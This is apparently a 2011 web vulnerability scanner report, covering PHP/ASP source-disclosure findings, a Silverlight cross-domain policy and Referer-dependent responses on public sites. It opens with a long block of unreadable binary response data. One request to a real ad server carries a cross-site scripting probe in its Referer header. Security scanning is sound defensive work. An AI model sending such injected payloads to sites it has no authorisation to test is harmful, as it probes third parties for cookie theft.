..q.Jh....St>_*R..!.C....fC"....(....4.v....pp...Z..j.......w.t.&..l.........7...1....._.T.u. .h.W..f..ND#...).-C...=V......x"...Y.........+
..?.R..b{...>k,...J..k.^....d...1...q4.ba{......w8......=hx.I....s...d.h...nl.......w..}.....x.:K.(.......pR.."..3m. .\....F.
-LyD.......??e.._......X{.;..Y..T.......(..    ]."~.7..(...e......=...]IG...}.......P.Z....H^Mr.r.s.rE...H.r...'.-Q%*...........{nP..U_..."...5..a-.;.;..2nH..3..x!..3.X..,.H./..-*d........Z...U..1X.d0..#z.v.X....jQ....h1{...^p...T'Y.....n5w....    ..B_..H....>...>............I..g...;>'.:...}|...bq.x.e.....+..A...~......!.Ng....U.j, k..z.X.../.rD..y..........E.......OJ.!6.....cD..@.."f...y!...`....]._.:..pZq...eo.....NT..H5&..Y.N4....Z.&.9J..{Z.;..A.%<...I..H...,..
J.V....$.{P......]..zc$.cc.o..........."..tm...B..m.]...]i..&&.]....T....x.    HRw../..e6.9.KD8.W.@c...f..J..........O..8....Lp.C...._/\.@..lLF.{...............A.....b.7<].X'Z.....-..?...Xr........=/.D..q./F9.G.iK.6...;.$.......z_K^..~c..Q..i.v...8..o.nRQr]'...<j.7).F!..7.O.!.J*SN.../.....k=..T.I...g.@.D+.....H.do4...Bg#................$}.c....O...U(\..$
.#.@.(....m+i.M..%..<..t5...U.,..,......K&)....7.>]O......n..z.).....5..`k....,~"/+y9_...MJv.%..t}..B..5V^.^X.h.E...{7.*[R......tL..rZ....4.V6....e`.1.K..^..'B-...z...Q.sc.wiN{..l..q....!..,#..2_"%.V.k0.....7.0a.*S.-.]..........t~;v.@... ..S....-Q.d&.I.Y.FR.@=.._+.....$i..<dQ.t.,V.)...6W..q...lL.~..=%c/*.3-PE..."Y.]u......#(..l..+.....?.
B..:\.....C....,..)......-B..SG.
..T1.V....|cw..(..7qA
....h...Wd.....$T..y....T......5.{.sF{E.&V.J.......F..0..Ce^...J.B.....N..{.X~.f.>..
QJ    o..>.G.N...#.......XT.g&.~)T...a....oP..N....&......O`...m.........k.z./........\dA0...2.2....k..)'i;.\k..{.y`.A........!.....+,I....a.g_'Q
V"..A4........Q._|.F.C.c..KB...l*...O+....q.....SI..    ...B..>....3#4...$.}B.E.:ty<......D/..*4........$,F.?.h\:.;..[l.Z.][.m...N<.....s..+L{.w...$].v.t.    L..r.........H.6..&.o..?z.U..........,.q....=...+..j..)X{X.Dmr!...D?.$.z...a.pY...%.`b...........E;I.m.5v.G .;}.H.7..?)...w.la0p....MVb........5x..D._B..=..=cs...&... T..    .*.|....#!..).    ...w,...~..`*....P?YX..........[..\..O
<+..X..'.N..S...gy[.bbf........"x|.1...V....%.X.....g.......9.q.Wr[1.....rj.F.+Z...77..    .^.`V}.PWY.g).:n...2.[u..4.[...,Y-......(...4..[.~..@.F,EN.7t....;......]nxM<.o.t8.U`E.'...+@...!..B.y...!H:.......J.......'.;    .......+?.>d...A'A.b....A... ....~..v....*C...a.......u..c.    ...h.YJ..<nZ...5"D..2l1.f...... .H......N...].....e......H.........u....o.. ..&.....%a...0D.)cF.E.e....;...$M.|.....6.]j...%C0.D"..R...
.Yy.. 3.N.....mZ..fy.hf.gf1z`..v.q~&..t?.N.]...P.o!.?XJaj.-.ej.*W.zh..._.q.!......+].a.....|y.3....j;....I..H...d...bB...B.."WlG..7.V^....1...D.....bp.
....:s.;..._[jem.....@....."..=C
{.S:s/...0.r@......r.g.S"...[.!6.
ir.f...-5.
6..@..z.......\.0.r...[.`.......&.......40n.p..]....s..    ;.=A._.{.....f..^BmcT,`%..:......G..kD...B...`..f.....b
.@.....Zrq.t.
M.?PU5(i.&P.......{....W.W..<v=...6...y.?....:...C...\@.V....P......O.Zo..Qe ..b..d_..........#..:....0.TGW|.....1|..x0..o.&9SwYN..49L....).<........z....L.......j..a....+.......y3.....    .......'.K..].............<.O;9...=...3....C7fy.*......p.    ..28l...3W....[...Rv.........-.&`...,)_.....E.T.=y..2.Q..P.8..KH.>Q....S....k..`..........u.M>...\.........Y...3R..Sn<X0..R,...i.............$.....I............)..L...F.yW.........9f.x<U....R.sA.e>....(1...._X.?.....H......k;...|.`d......[. VD..HI3.]_...B....ds'....l....j......2Y.Zg..18.g.X._...?;J..zRCr..8*...<...l.)..g.!.F@.....q..U.5..;h..W..r    ...X.%wM.p.f.......P..+U,.yr...i:..tw6GI.Vq..`.r.l.xdT.Ch1...xr..uY......#..^./au.R...y.@zX.s..Lq#o.CN.Z.5..    .....[......c..P.yS..M,.!.?~.r'.>.X..;..S.4.a......X.[....d..j.0t...........)yC>....Q...1|.#.G..l.CXS......NA..=.|WKgx.".....U.......V.U.......J....7Ug.../
H+2..59.~D.*.#...M....-..1.6.]Ee^..o.y....5.ZY,..S.1.....*...n....,..m...\ ..2.1N.R...#..    ...6.. #T..:.. .....J9...q.....aU....jHw.R.aSs.n,./#W{.7....;.%u...;.Q
I../.1..h..{q.6......e.\i...y.m.....A....3.....C..0...;..n..@......^.&..1.....(...oz..._.iYz"..$.oH.K....4A....
M..+sr2.@#...{.0...k..$o{..B..2..A.|4._...a.'..9...o.5I.eF...5.E>V...y`q;.........n._+.DC.!.':...R......7..t.i.....z...te....G.E{r.Db....N.......kU..i...    l.QS-c......]....../....F..)9_.=M>UO.t7=a9..o..........x~g......"...j!.\p.i..$7}`........w.k.f....tu.i..q..
.5F....i..k~.{z..).`9.R..(........J..Y...+..@..tf.wcbR...7.j..iwX...[MsW.O..gH.....k.?..!..
l..,s.!..l%..Q...[.K....tB..L..Op_..Y.+o..D....JI.O....{....r..s.l.!    .N.....vo.S..\    ..W ..!..}..d.Wr...........=.......k\oz......%."x.......&.B...7Ls.[.......(s...H.pd.C.^.%......:GM.S'.Q7..'.....VA8....}.k6...N..D'!.....y.wk?.I.4.}Ok.A..^88..4.h..'.....T....9.6/'4.....=:X.[.G.0...~...*x....X@..p.Wx.....S-...,./...>.%...M.+*..a......r}7    S...E.D.>.....2#    t_..z.....%.w`...O.Cr2..Vk.mN.....s..4................K.c..>:;.Z.7.(......th..%(xSD..pM...O../a......C.}Y....[~...g..e.. ....../L.p.......O..AjL.....![.i......t4..........^!._:u    .3.'...`...?.!...@..M......#...>...j......dw..<}&..(...........^.E.b..x.z.4W..Z...y...4.L..... ....Y....'......f+...(q..^..*.5*.ZnR...K...%J..zM.c%'....k.=l..Q...7n.....L.+e.V..t*6J.6.x..u..bv.__.8......l.C..    .c....-../@..{(............x.!.].......
8.w...M...Y.SX..XL......J/..M..`.~M...br...O0.
....g...`?N..Z.|..u.,.. ..D..G.....{...An.P..^....#....T8.!...&.....M..].z..t.._..._....A??.."t&..gJ..j..r|{.:..;....B9...!Sal.T..A..l.E,...0.....(.w....+J.Ov]H}z..g....@...    .5.[/k.....g.$.J....af){..L..+....s*....&[=!.gV...|5....z...|..vzxQ ..9k..... Sn.`}q..x(......t..S'~.......F.C.)Mb.E.....Lw...G.....en.k...#9...%.....G...K<N~R.....DY.BZ.Frr.,AY.....zaC)!.:......=....A&.....
d...    q.p.;l.*...^B6W    .{....g....U\.L.......+.?..`(...eu&............d.mB......yO...R%
.../..u..q/{....~.:u.ipCpV....P[....    Ys..q......m^POi..Y6S..6..*..(...)../MB..3.......t.y....O..G.....G....r.`.#.......m......x..'....7?.......R..5.M....m.E.ut.XB.<_Of.o...^..."f.x.. ..............,P.....eJ_...b.e9.....n.....U2...........V.@.P..E..C..`....#j<.....a..)..f.....iG.Y....i...{.L..u..%.r..`,..WT..p.(.u.C..c....:....f.`Z.\t..
S..j.......-.F..{A...DX..7.EI........S.)....d'.\F..V.H0.@m6...45...ok.cA.}D w).....2H.4.........TB.:....%"..*u=.Py..-....Y.....>.u..s..;d..U.L....j..':T.N..&..U....A..s..Y...#^b.@...u.i...........a
..1.&.....Mv%.D`.9....5...8..(*.Z..c.r.Z.O.,.0.>....7..?..vc...^9.*..?A....BH.e....-.P..i.wS+..i6....zk....?>
s.....l-....C..r..S.......k.0M+%.)...:\.iq00.....mO@.(AiJ...5.....1#n..2S.B...p.2z.k|(..KL....Y..E.....0..qe@x.m.R........u..E5=.B...S..".*..if.......YT....|+`S..'...}l| .I.s.Ia.....|.....i"...i8.?.EM
...[SNIP]...

16.2. http://meyerweb.com/eric/tools/css/reset/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://meyerweb.com
Path:   /eric/tools/css/reset/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /eric/tools/css/reset/ HTTP/1.1
Host: meyerweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:42:56 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 8737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>CSS Tools: Reset CSS</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</div><?php if (function_exists('_mw_lt_update')) _mw_lt_update(); ?>

<div id="redesigns" class="panel">
...[SNIP]...

16.3. http://mozex.mozdev.org/index.html

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://mozex.mozdev.org
Path:   /index.html

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /index.html HTTP/1.1
Host: mozex.mozdev.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.12
Content-Length: 9384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>mozdev.org - mozex: index</title>
<link href="//www.mozdev.org/skin/winter
...[SNIP]...
</table>
<?php
$dlurl = "http://downloads.mozdev.org/mozex/mozex-1.9.10.xpi";
?>

<!-- ***************** INFO/NEWS *************** -->
...[SNIP]...
<a href="<?php echo $dlurl; ?>"><b>Install <?php echo $dlurl; ?></b>
...[SNIP]...

16.4. http://www.addthis.com/bookmark.php

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" />
...[SNIP]...

16.5. http://www.addthis.com/feed.php

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /feed.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=deleted; expires=Sun, 24-Jan-2010 16:03:18 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7588
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<span class="style78" style="font-size:6px"><?php echo AT_COPYRIGHT_HTML ?></span>
...[SNIP]...

16.6. http://www.kbsp.com/x/fonts/AKZIGBES.TTF

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.kbsp.com
Path:   /x/fonts/AKZIGBES.TTF

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /x/fonts/AKZIGBES.TTF HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:05:18 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Wed, 20 Oct 2010 17:04:42 GMT
ETag: "97916-c528-4930f67cb1e80"
Accept-Ranges: bytes
Content-Length: 50472
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:06:18 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

...[SNIP]...

16.7. http://www.zazzle.com/netlingo

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.zazzle.com
Path:   /netlingo

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /netlingo HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 178097
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR CUR ADMa DEVa OUR BUS UNI PRE"
Set-Cookie: BLITZEN-2600=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2602=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2604=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2606=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2608=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2610=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2612=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2614=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2616=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2618=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2620=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2622=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2700=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2702=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2704=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2706=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2708=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2710=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2712=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2714=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2716=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2718=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2720=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2722=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2800=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2802=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2804=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2806=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2808=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2810=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2812=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2814=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2816=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2818=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2820=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2822=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2900=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2902=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2904=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2906=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2908=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2910=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2912=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2914=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2916=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2918=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2920=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2922=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3000=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3002=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3004=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3006=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3008=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3010=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3012=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3014=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3016=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3018=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3020=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3022=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: zshopurl=z%2fnetlingo; path=/
Set-Cookie: pis=1; path=/;
Set-Cookie: zm=AQABAAAA8wcAABTXMn3ZESMf_AapOt_c2LHphBNXMA5JPfT6gZUI8wuNU5G32qzfW8UK7aCUTmf44ZhwGkV-w3TWOo4zf3L1feOR19CmSKUwC-KzmxCF9Gui0H3lxIuicTJIjx3R9nwAzZSnJmkR; domain=.zazzle.com; path=/
Set-Cookie: zs=255EC80F-9BB5-440C-9150-9CB65A7DE4C8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=98B57018-41A2-4493-8838-36A22CB611B1; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5246001291012673539; path=/
Date: Tue, 25 Jan 2011 04:40:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" type="text/css" href="http://www.zazzle.co
...[SNIP]...
(_x[1]),_C=_z?'from':'to',_D=_A[_C];_u&&_u(_y+':'+_C,_D.required);_r=_D.expansion(_r,_B?('{'+_B):'');}}}}return _r;}_a.compile=function(_E,_F){_F=_F||_h;var _G=[],_H={},_I={},_J={},_K=_F.openerToken||'<%',_L=_F.closerToken||'%>',_M=_F.gobbleWhitespace!==_c,_N=_E.length,_O='var output = [];',_P='return output.join (\'\');',_Q=[_O],_R=[],_S=0,_T,_U=_b,_V,_W,_X,_Y,_Z;function _0(_W){if(_R.length){_Q.push('output.push ('+_R.join
...[SNIP]...

17. Silverlight cross-domain policy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279991242800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 14:58:56 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

18. Referer-dependent response
There are 15 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:
  • Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
  • Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
  • Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kind of user-supplied data.



18.1. http://ads.dailystar.com.lb/www/delivery/afr.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.dailystar.com.lb
Path:   /www/delivery/afr.php

Request 1

GET /www/delivery/afr.php?zoneid=45&cb=456 HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=29485f2e357d39dee079a30ead6a0e41; expires=Tue, 24-Jan-2012 21:58:37 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1304

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://ads.dailystar.com.lb/www/delivery/ck.php?oaparams=2__bannerid=409__zoneid=45__cb=68e7037d84__oadest=http%3A%2F%2Fwww.cineklik.com' target='_blank'><img src='http://ads.dailystar.com.lb/www/images/02303828ed18756d6534202f69102117.gif' width='728' height='90' alt='Cineklik.com :: a Klik away from Movies' title='Cineklik.com :: a Klik away from Movies' border='0' /></a><div id='beacon_68e7037d84' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://ads.dailystar.com.lb/www/delivery/lg.php?bannerid=409&amp;campaignid=194&amp;zoneid=45&amp;loc=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&amp;cb=68e7037d84' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

Request 2

GET /www/delivery/afr.php?zoneid=45&cb=456 HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=438206fd36140dfe6aac05f81e2ba322; expires=Tue, 24-Jan-2012 21:58:58 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1082

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
